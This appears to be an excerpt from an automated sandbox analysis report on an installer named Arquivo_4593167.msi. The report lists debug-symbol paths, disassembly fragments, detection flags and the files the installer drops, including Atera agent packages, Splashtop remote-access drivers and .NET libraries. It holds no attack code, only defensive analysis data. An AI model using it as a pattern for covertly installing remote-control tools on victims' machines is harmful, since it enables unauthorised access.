                                Source: Binary string: C:\agent\_work\66\s\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbP source: rundll32.exe, 00000003.00000003.1679439512.0000000004815000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000440E000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\CodeBases\isdev\Src\Runtime\InstallScript\ISBEW64\x64\Release\ISBEW64.pdb source: _isA1FD.exe, 00000028.00000000.2252067091.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp, _isA1FD.exe, 00000028.00000002.2255085096.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp, _isA1FD.exe, 00000029.00000002.2256104339.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp, _isA1FD.exe, 00000029.00000000.2252661620.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp, _isA1FD.exe, 0000002A.00000000.2253370724.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp, _isA1FD.exe, 0000002A.00000002.2256268057.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp, _isA1FD.exe, 0000002B.00000002.2258725000.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp, _isA1FD.exe, 0000002B.00000000.2255045633.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp, _isA1FD.exe, 0000002C.00000000.2255937185.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp, _isA1FD.exe, 0000002C.00000002.2259881834.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp, _isA1FD.exe, 0000002D.00000002.2289803250.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp, _isA1FD.exe, 0000002D.00000000.2257963587.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp, _isA1FD.exe, 0000002E.00000002.2262306546.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp, _isA1FD.exe, 0000002E.00000000.2259356144.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp, _isA1FD.exe, 0000002F.00000002.2262839005.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp, _isA1FD.exe, 0000002F.00000000.2260351966.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp, _isA1FD.exe, 00000030.00000002.2265092670.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp, _isA1FD.exe, 00000030.00000000.2261419648.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp, _isA1FD.exe, 00000031.00000002.2267141038.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp, _isA1FD.exe, 00000031.00000000.2262303471.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Emit\net6.0-Release\System.Reflection.Emit.pdb source: System.Reflection.Emit.dll.1.dr
                                Source: Binary string: D:\a\1\s\Atera.AgentPackage.Common\obj\Release\Atera.AgentPackage.Common.pdbPf source: AgentPackageAgentInformation.exe, 00000014.00000002.1954998107.000001BE62A42000.00000002.00000001.01000000.00000018.sdmp
                                Source: Binary string: W.pdb$Gs0 source: PreVerCheck.exe, 00000025.00000002.2562182711.0000000000BF5000.00000002.00000001.01000000.0000001C.sdmp
                                Source: Binary string: /_/artifacts/obj/System.Private.DataContractSerialization/net6.0-Release/System.Private.DataContractSerialization.pdb source: System.Private.DataContractSerialization.dll.1.dr
                                Source: Binary string: E:\A\_work\39\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Diagnostics.DiagnosticSource\net45\System.Diagnostics.DiagnosticSource.pdb source: System.Diagnostics.DiagnosticSource.dll1.24.dr
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Xml.XDocument\net6.0-Release\System.Xml.XDocument.pdb source: System.Xml.XDocument.dll.1.dr
                                Source: Binary string: api-ms-win-core-localization-l1-2-0.pdbGCTL source: api-ms-win-core-localization-l1-2-0.dll.1.dr
                                Source: Binary string: System.Security.Cryptography.Cng.ni.pdb source: System.Security.Cryptography.Cng.dll.1.dr
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.CSharp\net6.0-windows-Release\Microsoft.CSharp.pdb source: Microsoft.CSharp.dll.1.dr
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Encodings.Web\Release\net6.0\System.Text.Encodings.Web.pdbSHA256~f source: System.Text.Encodings.Web.dll0.24.dr
                                Source: Binary string: D:\a\c-sharp\c-sharp\src\Api\PubnubApi\obj\Release\net45\Pubnub.pdbSHA256 source: AteraAgent.exe, 0000000C.00000002.1792642291.000001C5E59A2000.00000002.00000001.01000000.00000011.sdmp
                                Source: Binary string: D:\a\c-sharp\c-sharp\src\Api\PubnubApi\obj\Release\net45\Pubnub.pdb source: AteraAgent.exe, 0000000C.00000002.1792642291.000001C5E59A2000.00000002.00000001.01000000.00000011.sdmp, AteraAgent.exe, 00000018.00000002.2972325371.0000016BE9E74000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\agent\_work\66\s\build\ship\x86\SfxCA.pdb source: Arquivo_4593167.msi
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Tasks.Dataflow\net6.0-Release\System.Threading.Tasks.Dataflow.pdbRSDS source: System.Threading.Tasks.Dataflow.dll.1.dr
                                Source: Binary string: System.Data.Common.ni.pdb source: System.Data.Common.dll.1.dr
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Serialization.Json\net6.0-Release\System.Runtime.Serialization.Json.pdbT*n* `*_CorDllMainmscoree.dll source: System.Runtime.Serialization.Json.dll.1.dr
                                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.Serialization.Json\4.0.1.0\System.Runtime.Serialization.Json.pdb source: System.Runtime.Serialization.Json.dll.24.dr
                                Source: Binary string: c:\winddk\7600.16385.1\src\setup\difxapi\difxcmd\objfre_win7_x86\i386\DIFxCmd.pdb source: DIFxCmd.exe.1.dr
                                Source: Binary string: /_/artifacts/obj/Microsoft.Extensions.FileSystemGlobbing/Release/net6.0/Microsoft.Extensions.FileSystemGlobbing.pdbSHA256 source: Microsoft.Extensions.FileSystemGlobbing.dll.24.dr
                                Source: System.Reflection.DispatchProxy.dll.1.drStatic PE information: 0xD237EF3C [Sun Oct 5 09:11:24 2081 UTC]
                                Source: C:\Windows\Temp\SplashtopStreamer.exeCode function: 36_2_004214F2 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,36_2_004214F2
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_3_06D457B8 push es; ret 4_3_06D45840
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_3_06D44E90 push es; ret 4_3_06D44EA0
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_3_06D458D1 push es; ret 4_3_06D458E0
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_3_06D458F0 push es; ret 4_3_06D45900
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_3_06D458B0 push es; ret 4_3_06D458C0
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_3_06D45910 push es; ret 4_3_06D45920
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_3_06E384A1 push es; ret 4_3_06E384B0
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_3_06E34ECF push dword ptr [esp+ecx*2-75h]; ret 4_3_06E34ED3
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 12_2_00007FFD9B60D45B push cs; retf 12_2_00007FFD9B60D465
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 12_2_00007FFD9B60000A push esi; retf 12_2_00007FFD9B60002B
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 13_2_00007FFD9B640AC4 pushad ; ret 13_2_00007FFD9B640AD1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 13_2_00007FFD9B830F08 push eax; ret 13_2_00007FFD9B830F94
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_3_069D57B8 push es; ret 16_3_069D5840
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_3_069D4E90 push es; ret 16_3_069D4EA0
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_3_069D6BF1 push es; ret 16_3_069D6C00
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_3_069D6880 push es; ret 16_3_069D6890
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_3_069DD1A1 push es; ret 16_3_069DD1B0
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_3_069DDDC0 push es; ret 16_3_069DDDD0
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_3_069D5890 push es; ret 16_3_069D58A0
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_3_069D58B0 push es; ret 16_3_069D58C0
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_3_069D58D3 push es; ret 16_3_069D58E0
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_3_069D58F0 push es; ret 16_3_069D5940
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_3_069D5850 push es; ret 16_3_069D5860
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_3_069D5870 push es; ret 16_3_069D5880
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_3_069D5953 push es; ret 16_3_069D5960
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_3_06AC4ECF push dword ptr [esp+ecx*2-75h]; ret 16_3_06AC4ED3
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_3_06AC18F0 push es; ret 16_3_06AC1900
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 20_2_00007FFD9B6300BD pushad ; iretd 20_2_00007FFD9B6300C1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 20_2_00007FFD9B645587 push ebp; iretd 20_2_00007FFD9B6455D8
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 22_2_00007FFD9B6200BD pushad ; iretd 22_2_00007FFD9B6200C1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 24_2_00007FFD9B61A654 push eax; retf 24_2_00007FFD9B61A669
                                Source: System.Linq.dll.1.drStatic PE information: section name: .text entropy: 6.8378154934993045

                                Persistence and Installation Behavior

                                barindex
                                Creates files in the system32 config directory
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C56C4404C4DEF0DC88E5FCD9F09CB2F1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2E248BEDDBB2D85122423C41028BFD4
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_DEB07B5578A606ED6489DDA2E357A944
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_DEB07B5578A606ED6489DDA2E357A944
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageAgentInformation.exe.log
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageSTRemote.exe.log
                                Sample is not signed and drops a device driver
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\GamePad\stgamepad.sysJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\GamePad\64bits\stgamepad.sysJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\win10\x64\lci_proxywddm.sysJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\win10\x86\lci_proxywddm.sysJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\win7\x64\lci_proxywddm.sysJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\win7\x86\lci_proxywddm.sysJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\vista\driver\mv2.sysJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\vista64\driver\mv2.sysJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\xp\driver\mv2.sysJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\xp64\driver\mv2.sysJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Monitor\stdpms.sysJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Monitor\64bits\stdpms.sysJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVAD\win10\32bits\stvad.sysJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVAD\win10\64bits\stvad.sysJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVAD\win7\32bits\stvad.sysJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVAD\win7\64bits\stvad.sysJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVideo\stmirror.sysJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVideo\stvideo.sysJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVideo\64bits\stmirror.sysJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVideo\64bits\stvideo.sysJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVSpk\32bits\stvspk.sysJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVSpk\64bits\stvspk.sysJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\VirtualDriver\hidkmdf.sysJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\VirtualDriver\sthid.sysJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\VirtualDriver\64bits\hidkmdf.sysJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\VirtualDriver\64bits\sthid.sysJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\VirtualDriver\utils\DIFxCmd.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\VirtualDriver\utils\devcon64.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Linq.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Text.Encoding.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.HttpListener.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Diagnostics.Contracts.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Drawing.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\PkgHelper.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\utils\DIFxCmd.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Private.Xml.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Cryptography.X509Certificates.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\StructureMap.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Diagnostics.Debug.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\plugin\SRAppAnnotation.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.NetworkInformation.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\GamePad\utils\DIFxCmd64.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.Cryptography.Encoding.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\NLog.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVideo\64bits\stmirror.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.Serialization.Primitives.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\System.ValueTuple.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\vista64\driver\mv2.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\win10\64bits\xdbook.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Linq.Queryable.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.Cryptography.OpenSsl.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Text.Encoding.Extensions.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\Microsoft.CSharp.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\WBAppVidRec.exeJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIC961.tmp-\System.Management.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Text.Encoding.CodePages.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI172D.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC672.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Support\EvtLogProvider\stevt_srs_x86.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIFB85.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.FileSystem.Primitives.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\win10\64bits\xdsmplui.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRFeature.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Cryptography.Csp.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.WebSockets.Client.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRManager.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVSpk\utils\devcon64.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\GamePad\utils\DIFxCmd.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\dbghelp.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\win10\x86\my_setup.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Data.DataSetExtensions.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\win10\32bits\xdnup.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRx264WrapperEx.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRSelfSignCertUtil.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Serialization.Formatters.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Threading.Tasks.Dataflow.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\avutil-55.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRDxgiHelper.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Diagnostics.TraceSource.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\plugin\SRAppBrowser.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.Principal.Windows.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\win10\32bits\stprintmon.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.Cryptography.Csp.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\64bits\xdscale.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\win10\32bits\xdscale.dllJump to dropped file
